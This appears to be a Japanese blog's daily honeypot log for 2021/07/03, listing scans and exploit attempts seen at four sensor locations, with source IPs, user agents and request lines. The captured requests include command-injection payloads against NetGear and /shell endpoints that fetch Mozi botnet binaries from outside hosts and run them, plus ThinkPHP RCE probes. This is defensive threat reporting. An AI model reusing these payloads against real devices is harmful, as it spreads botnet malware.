コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2021/07/03 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2021/07/03分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location:JP

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
gbrmssによるスキャン行為
l9exploreによるスキャン行為
zgrabによるスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。

Location:US

NetGear製品の脆弱性を狙うアクセス
gbrmssによるスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス
Gh0stRATのような動き
を確認しました。

Location:UK

Spring Bootの脆弱性を狙うアクセス
gbrmssによるスキャン行為
zgrabによるスキャン行為
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//58[.]249[.]87[.]13:39191/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
アクセス数推移

JP:総アクセス数:64 (前日比:-9)
US:総アクセス数:297 (前日比:+249)
UK:総アクセス数:32 (前日比:-98)
SG:総アクセス数:47 (前日比:-23)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
2 2.57.122.53 Romania
1 5.1.83.157 Germany
1 5.188.210.227 Russia
1 13.78.149.131 United States
1 18.117.102.180 United States
1 18.118.0.200 United States
2 20.205.205.53 United States
1 40.76.26.76 United States
1 40.124.28.247 United States
1 45.130.83.218 Netherlands
22 45.146.164.110 Russia
2 47.241.253.80 United States
2 52.53.174.3 United States
1 77.247.108.77 Belize
1 87.121.52.88 Bulgaria
1 104.244.72.123 United States
1 135.125.244.48 France
1 135.125.246.189 France
1 139.59.248.45 Singapore
6 143.198.162.163 United States
9 167.71.13.196 United States
1 192.241.220.201 United States
1 199.19.225.175 United States
1 206.189.96.154 United States
1 209.141.49.75 United States
1 221.232.181.92 China

UserAgent一覧

件数 UserAgent
6 -
1 AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
1 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0
8 l9explore/1.0.0
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01
1 \x16\x03\x01\x01\xfa\x01
15 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /.json HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
3 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/config.php HTTP/1.0
1 GET /c/version.js HTTP/1.1
1 GET /config.json HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /idx_config/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /server-status HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//221[.]232[.]181[.]92:57774/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /telescope/requests HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/ HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
2 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
1 HEAD / HTTP/1.0\n
1 HEAD /1sxA HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.htm HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 18.118.0.200 United States
2 20.199.110.122 United States
1 20.205.205.53 United States
1 27.43.117.195 China
1 34.77.162.23 United States
11 45.146.164.110 Russia
3 51.158.78.179 France
1 66.240.205.34 United States
1 67.205.157.240 United States
1 77.247.108.77 Belize
3 91.241.19.99 Russia
1 112.240.208.149 China
257 119.29.17.199 China
6 178.62.30.103 United States
1 183.188.226.127 China
1 199.19.224.153 United States
2 199.19.224.201 United States
2 209.141.49.75 United States
1 222.134.163.30 China

UserAgent一覧

件数 UserAgent
11 -
2 Hello, World
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 OPR/55.0.2994.44
256 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
1 gbrmss/7.29.0
1 python-requests/2.23.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
3 \x03
1 \x16\x03\x01
1 CONNECT www[.]bing[.]com/:443 HTTP/1.1
4 GET /.env HTTP/1.1
1 GET //favicon.ico HTTP/1.1
1 GET /404.jpg HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?c=4e5e5d7364f443e28fbf0d3ae744a59a HTTP/1.1
1 GET /?q=login.destroy.session&r=0.01231231230 HTTP/1.1
1 GET /API/DW/Dwplugin/SystemLabel/SiteConfig.htm HTTP/1.1
1 GET /API/DW/Dwplugin/TemplateManage/login_site.htm HTTP/1.1
1 GET /API/DW/Dwplugin/TemplateManage/manage_site.htm HTTP/1.1
1 GET /API/DW/Dwplugin/TemplateManage/save_template.htm HTTP/1.1
1 GET /API/DW/Dwplugin/ThirdPartyTags/SiteFactory.xml HTTP/1.1
1 GET /Admin/Common/HelpLinks.xml HTTP/1.1
1 GET /Admin/Images/LoginImages/admin_text.gif HTTP/1.1
1 GET /Admin/Images/LoginImages/admin_top.gif HTTP/1.1
1 GET /Admin/Login.aspx HTTP/1.1
1 GET /CHANGELOG.txt HTTP/1.1
1 GET /CuteSoft_Client/CuteEditor/Help/default.htm HTTP/1.1
1 GET /CuteSoft_Client/CuteEditor/ImageEditor/listfiles.aspx HTTP/1.1
1 GET /CuteSoft_Client/CuteEditor/Images/log.gif HTTP/1.1
1 GET /CuteSoft_Client/CuteEditor/Style/IE.css HTTP/1.1
1 GET /Editor.js HTTP/1.1
1 GET /Error.aspx HTTP/1.1
1 GET /FCK/editor/js/fckeditorcode_ie.js HTTP/1.1
1 GET /FCK/fckeditor.js HTTP/1.1
1 GET /Help HTTP/1.1
1 GET /Images/login/biaoti.jpg HTTP/1.1
1 GET /Images/login/lefttu.jpg HTTP/1.1
1 GET /Images/login/mainlogo.gif HTTP/1.1
1 GET /Include/EcsServerApi.js HTTP/1.1
1 GET /Install/logo.gif HTTP/1.1
1 GET /License.txt HTTP/1.1
1 GET /Ntalker/lawfirm.aspx?17 HTTP/1.1
1 GET /Prompt/images/P_Wrong.gif HTTP/1.1
1 GET /Public/Admin/Images/login_main_bg.jpg HTTP/1.1
1 GET /README.txt HTTP/1.1
1 GET /Scripts/jquery/maticsoft.jquery.min.js HTTP/1.1
1 GET /Search.html HTTP/1.1
1 GET /Site/Pages/WebResources.ashx/PoweredByKodakImage HTTP/1.1
1 GET /Site/SystemThemes/7917A0869761B5458281E407AE0090F5/Images/ISBanner58px.jpg HTTP/1.1
1 GET /Template/Default/Skin/user/images/login_back.jpg HTTP/1.1
1 GET /User/Login.aspx HTTP/1.1
1 GET /UserCenter/css/admin/bgimg/admin_all_bg.png HTTP/1.1
1 GET /Wq_StranJF.js HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /addons/theme/stv1/_static/image/favicon.ico HTTP/1.1
1 GET /addons/theme/stv1/_static/ts2/layout.css HTTP/1.1
1 GET /addons/theme/stv2/_static/ts2/layout.css HTTP/1.1
1 GET /admin HTTP/1.1
1 GET /admin.php HTTP/1.1
1 GET /admin.php?mod=profile&u_key=123456 HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /admin/SouthidcEditor/ButtonImage/standard/componentmenu.gif HTTP/1.1
1 GET /admin/SouthidcEditor/Dialog/dialog.js HTTP/1.1
1 GET /admin/SouthidcEditor/ewebeditor.asp?id=57&style=southidc HTTP/1.1
1 GET /admin/admin_login.php?act=login HTTP/1.1
1 GET /admin/config.php HTTP/1.0
1 GET /admin/editor/ HTTP/1.1
1 GET /admin/inc/xml.xslt HTTP/1.1
1 GET /admin/index.php HTTP/1.1
1 GET /admin/js/IdSUtil.js HTTP/1.1
1 GET /admin/login.asp HTTP/1.1
1 GET /admin/login.aspx HTTP/1.1
1 GET /admin/login.php HTTP/1.1
1 GET /admin/start/index.php HTTP/1.1
1 GET /admin/template/article_more/config.htm HTTP/1.1
1 GET /administrator/manifests/files/joomla.xml HTTP/1.1
1 GET /adminsoft/templates/images/login_bg_top.jpg HTTP/1.1
1 GET /advfile/ad12.js HTTP/1.1
1 GET /api/api_user.xml HTTP/1.1
1 GET /app/Tpl/fanwe_1/js/DD_belatedPNG_0.0.8a-min.js HTTP/1.1
1 GET /app/home/skins/default/style.css HTTP/1.1
1 GET /app/images/login/logo.png HTTP/1.1
1 GET /app/images/login/toplogo.gif HTTP/1.1
1 GET /app/js/source/wcmlib/WCMConstants.js HTTP/1.1
1 GET /app/login.jsp HTTP/1.1
1 GET /apps/admin/_static/image/login_box_bg.png HTTP/1.1
1 GET /archive/archive.css HTTP/1.1
1 GET /archiver HTTP/1.1
1 GET /archiver/ HTTP/1.1
1 GET /asp.net/README.txt HTTP/1.1
1 GET /auth/login HTTP/1.1
1 GET /back/scripts/jspxcms_choose.js HTTP/1.1
1 GET /base/login/login.php HTTP/1.1
1 GET /bbs/ HTTP/1.1
1 GET /bencandy.php HTTP/1.1
1 GET /blog/ HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /business/images/index-gg1.jpg HTTP/1.1
1 GET /c/version.js HTTP/1.1
1 GET /cgi/index.cgi HTTP/1.1
1 GET /changelog.txt HTTP/1.1
1 GET /ckeditor/ckeditor.js HTTP/1.1
1 GET /ckeditor/ckfinder/ckfinder.html HTTP/1.1
1 GET /ckeditor/ckfinder/install.txt HTTP/1.1
1 GET /ckfinder/ckfinder.html HTTP/1.1
1 GET /ckfinder/install.txt HTTP/1.1
1 GET /clientscript/vbulletin_ajax_htmlloader.js HTTP/1.1
1 GET /common/common.js HTTP/1.1
1 GET /common/help/images/helplogo.gif HTTP/1.1
1 GET /common/help/images/helplogo_zh.gif HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /console/auth/reg_newuser.jsp HTTP/1.1
1 GET /console/include/not_login.htm HTTP/1.1
1 GET /console/js/CTRSRequestParam.js HTTP/1.1
1 GET /console/js/CWCMDialogHead.js HTTP/1.1
1 GET /coremail/common/help/images/helplogo.gif HTTP/1.1
1 GET /coremail/common/help/images/helplogo_zh.gif HTTP/1.1
1 GET /custom/SkinTemplate/skin/public/images/sys-logo-1caitong-180.jpg HTTP/1.1
1 GET /customdir/images/english_logo.jpg HTTP/1.1
1 GET /data/admin/ver.txt HTTP/1.1
1 GET /data/images/wap_logo.gif HTTP/1.1
1 GET /datacenter/downloadApp/showDownload.do HTTP/1.1
1 GET /default/css/em_css.css HTTP/1.1
1 GET /default/images/logo.gif HTTP/1.1
1 GET /deptWebsiteAction.do HTTP/1.1
1 GET /dialog/dialog.js HTTP/1.1
1 GET /digg.php HTTP/1.1
1 GET /docs.css HTTP/1.1
1 GET /docs/ HTTP/1.1
1 GET /docs/DOCUMENTATION.txt HTTP/1.1
1 GET /doku.php HTTP/1.1
1 GET /e/master/login.aspx HTTP/1.1
1 GET /eams/static/scripts/grade/course/input.js HTTP/1.1
1 GET /editor/fckeditor.js HTTP/1.1
1 GET /editor/js/fckeditorcode_ie.js HTTP/1.1
1 GET /examples/file-manager.html HTTP/1.1
1 GET /examples/index.html HTTP/1.1
1 GET /examples/readonly.html HTTP/1.1
1 GET /extern.php?action=feed&type=atom HTTP/1.1
1 GET /extman/default/images/logo.gif HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /fckeditor.js HTTP/1.1
1 GET /fckeditor/editor/dtd/fck_dtd_test.html HTTP/1.1
1 GET /fckeditor/editor/js/fckeditorcode_ie.js HTTP/1.1
1 GET /fckeditor/fckconfig.js HTTP/1.1
1 GET /fckeditor/fckeditor.js HTTP/1.1
1 GET /fckeditor/license.txt HTTP/1.1
1 GET /feed.asp HTTP/1.1
1 GET /forum.php HTTP/1.1
1 GET /forum/ HTTP/1.1
1 GET /forums/list.page HTTP/1.1
1 GET /help/ch_gb/images/help-title.gif HTTP/1.1
1 GET /help/en/h_authenticate.html HTTP/1.1
1 GET /help/user/index.html HTTP/1.1
1 GET /helpnew/faq/faq_simple_zh_CN.jsp HTTP/1.1
1 GET /history.txt HTTP/1.1
1 GET /ids/admin/login.jsp HTTP/1.1
1 GET /ids/admin/userhome/forgetPwd.jsp HTTP/1.1
1 GET /images/2_11.gif HTTP/1.1
1 GET /images/Default_bg_002.gif HTTP/1.1
1 GET /images/branding/logo.gif HTTP/1.1
1 GET /images/default/post_bt.gif HTTP/1.1
1 GET /images/favicon.ico HTTP/1.1
1 GET /images/hwem.css HTTP/1.1
1 GET /images/login/eyoumail.gif HTTP/1.1
1 GET /images/login/icon-up.gif HTTP/1.1
1 GET /images/login/logo.gif HTTP/1.1
1 GET /images/login9/login_33.jpg HTTP/1.1
1 GET /images/login_Name.jpg HTTP/1.1
1 GET /images/logo-white.png HTTP/1.1
1 GET /images/logo_88x31.gif HTTP/1.1
1 GET /images/logo_product-cml.png HTTP/1.1
1 GET /images/zh-CN/logo.ico HTTP/1.1
1 GET /imagesschool/style1/flash2.jpg HTTP/1.1
1 GET /img/pic/login/top-left.jpg HTTP/1.1
1 GET /inc/Templates/rss.xslt HTTP/1.1
1 GET /inc/playerKinds.xml HTTP/1.1
1 GET /inc/rsd.php HTTP/1.1
1 GET /include/dedeajax2.js HTTP/1.1
1 GET /include/dialog/config.php HTTP/1.1
1 GET /include/install_ocx.aspx HTTP/1.1
1 GET /includes/general.js HTTP/1.1
1 GET /index.cgi HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?m=admin HTTP/1.1
1 GET /index.php?m=admin&c=index&a=login&pc_hash= HTTP/1.1
1 GET /index.php?m=search HTTP/1.1
1 GET /index.php?m=wap HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /install HTTP/1.1
1 GET /issmall/ HTTP/1.1
1 GET /jcms/index.jsp HTTP/1.1
1 GET /jcms/index_jcms.jsp HTTP/1.1
1 GET /js/ajax_x.js HTTP/1.1
1 GET /js/buttons.js HTTP/1.1
1 GET /kindeditor-min.js HTTP/1.1
1 GET /kindeditor.js HTTP/1.1
1 GET /ks_inc/ajax.js HTTP/1.1
1 GET /lang/en.js HTTP/1.1
1 GET /licence.txt HTTP/1.1
1 GET /license.txt HTTP/1.1
1 GET /list.php HTTP/1.1
1 GET /login/Jeecms.do HTTP/1.1
1 GET /logo/logo_jw.png HTTP/1.1
1 GET /m HTTP/1.1
1 GET /maintlogin.jsp HTTP/1.1
1 GET /master/login.aspx HTTP/1.1
1 GET /max-templates/classic/styles/app.css HTTP/1.1
1 GET /media/com_hikashop/js/hikashop.js HTTP/1.1
1 GET /member/space/company/info.txt HTTP/1.1
1 GET /new_gb/help/images/usage/3.3.gif HTTP/1.1
1 GET /next/img/logo.gif HTTP/1.1
1 GET /nobody/mobile.htm?Login=Captcha HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/docs.css HTTP/1.1
1 GET /phpmyadmin/favicon.ico HTTP/1.1
1 GET /phpmyadmin/phpmyadmin/docs.css HTTP/1.1
1 GET /phpmyadmin/phpmyadmin/favicon.ico HTTP/1.1
1 GET /phpmyadmin/phpmyadmin/themes/original/img/logo_right.png HTTP/1.1
1 GET /phpmyadmin/themes/original/img/logo_right.png HTTP/1.1
1 GET /plug/publish HTTP/1.1
1 GET /plugin.php?id=milu_seotool:sitemap&tpl=no&myac=milu_seotool_cron&inajax=1 HTTP/1.1
1 GET /plugins/anchor/anchor.js HTTP/1.1
1 GET /plugins/filemanager/filemanager/js HTTP/1.1
1 GET /plus/download.php HTTP/1.1
1 GET /plus/heightsearch.php HTTP/1.1
1 GET /plus/rssmap.html HTTP/1.1
1 GET /plus/sitemap.html HTTP/1.1
1 GET /pub/guiedit/guiedit.js HTTP/1.1
1 GET /pub/skins/pmwiki/pmwiki.css HTTP/1.1
1 GET /public/about.html HTTP/1.1
1 GET /public/js/ipb.js HTTP/1.1
1 GET /readme.html HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /rss.aspx HTTP/1.1
1 GET /rss.php HTTP/1.1
1 GET /script/login.js HTTP/1.1
1 GET /script/valid_formdata.js HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//183[.]188[.]226[.]127:37134/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /siteserver/login.aspx HTTP/1.1
1 GET /siteserver/upgrade/default.aspx HTTP/1.1
1 GET /skin/frontend/default/modern/css/styles.css HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /stalker_portal/c/version.js HTTP/1.1
1 GET /static/hgicon.png HTTP/1.1
1 GET /static/images/logo/webserver_small.gif HTTP/1.1
1 GET /stream/live.php HTTP/1.1
1 GET /streaming/clients_live.php HTTP/1.1
1 GET /style/default/hdwiki.css HTTP/1.1
1 GET /stylesheet.css HTTP/1.1
1 GET /system/Login.aspx HTTP/1.1
1 GET /system/Update.aspx HTTP/1.1
1 GET /system/language/zh-cn.xml HTTP/1.1
1 GET /system/skins/default/system.login.htm HTTP/1.1
1 GET /system_api.php HTTP/1.1
1 GET /template/1/bluewise/_files/jspxcms.css HTTP/1.1
1 GET /template/home.htm HTTP/1.1
1 GET /templates/jsn_glass_pro/ext/hikashop/jsn_ext_hikashop.css HTTP/1.1
1 GET /test_404_page/ HTTP/1.1
1 GET /themes/default/default.css HTTP/1.1
1 GET /themes/default/graphics/favicon.ico HTTP/1.1
1 GET /themes/default/graphics/horde-power1.png HTTP/1.1
1 GET /themes/graphics/horde-power1.png HTTP/1.1
1 GET /tools/rss.aspx HTTP/1.1
1 GET /tpl/login/user/images/login_bg_1.jpg HTTP/1.1
1 GET /tpl/user/tpl1/css/skins/blue.css HTTP/1.1
1 GET /uc_server/control/admin/db.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /was/help.jsp HTTP/1.1
1 GET /was/main.html HTTP/1.1
1 GET /was5/web/index.jsp HTTP/1.1
1 GET /wcm/ HTTP/1.1
1 GET /web2/login_template/1.files/Logo1.jpg HTTP/1.1
1 GET /webbuilder/script/locale/wb-lang-zh_CN.js HTTP/1.1
1 GET /weblog/ HTTP/1.1
1 GET /whir_system/login.aspx HTTP/1.1
1 GET /whir_system/module/security/login.aspx HTTP/1.1
1 GET /wp-content HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-cron.php HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET /ycportal/js/wbTextBox/showimg.jsp HTTP/1.1
1 GET /ymail/images/index_r1_c4.jpg HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
2 HEAD / HTTP/1.0
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//likeapro[.]best/d53315bea08cec50d2591fcaf3b32dc5d289cdc6c16b7e8bed8c8e3f7ceaa34e69ff18f5f9d7ee802b8ce9d00d33d327d5a6c92f1135e158f8cdf14dde6e4cddd5cac60cac5de97f80f52c9fff97c2d3b043cece37cfa9da2f74a548aeed6805 HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
22 45.146.164.110 Russia
1 50.228.252.210 United States
1 66.240.205.34 United States
1 77.247.108.77 Belize
1 92.223.85.153 Luxembourg
1 117.241.54.1 India
1 178.72.69.26 Russia
1 192.241.215.94 United States
1 192.241.222.97 United States
1 199.19.225.175 United States
1 209.141.49.75 United States

UserAgent一覧

件数 UserAgent
2 -
1 Hello, world
22 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
2 Mozilla/5.0 zgrab/0.x
1 gbrmss/7.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
2 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/config.php HTTP/1.0
2 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
2 2.56.59.175 Netherlands
1 3.12.151.40 United States
1 13.78.149.131 United States
1 18.116.88.25 United States
1 20.102.56.117 United States
2 40.124.28.247 United States
1 42.194.183.200 China
1 45.9.150.27 Dominica
11 45.146.164.110 Russia
3 51.158.78.179 France
2 54.215.232.146 United States
1 58.249.87.13 China
1 103.28.70.137 United States
1 119.179.237.132 China
1 125.47.202.88 China
1 138.68.170.104 United States
7 143.198.237.247 United States
1 178.141.136.225 Russia
1 192.241.216.12 United States
1 192.241.220.21 United States
1 199.19.224.201 United States
1 199.19.225.175 United States
1 206.189.96.154 United States
3 212.47.244.68 France

UserAgent一覧

件数 UserAgent
7 -
1 Hello, world
7 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.0; WOW64; rv:60.2.0) Gecko/20100101 Firefox/60.2.0
2 Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
9 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
2 Mozilla/5.0 zgrab/0.x
1 python-requests/2.18.4

リクエスト内容一覧

件数 Method Request Protocol
1 \x16\x03\x01\x014\x01
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
9 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=__HelloThinkPHP HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /login HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]47[.]202[.]88:42940/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//58[.]249[.]87[.]13:39191/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
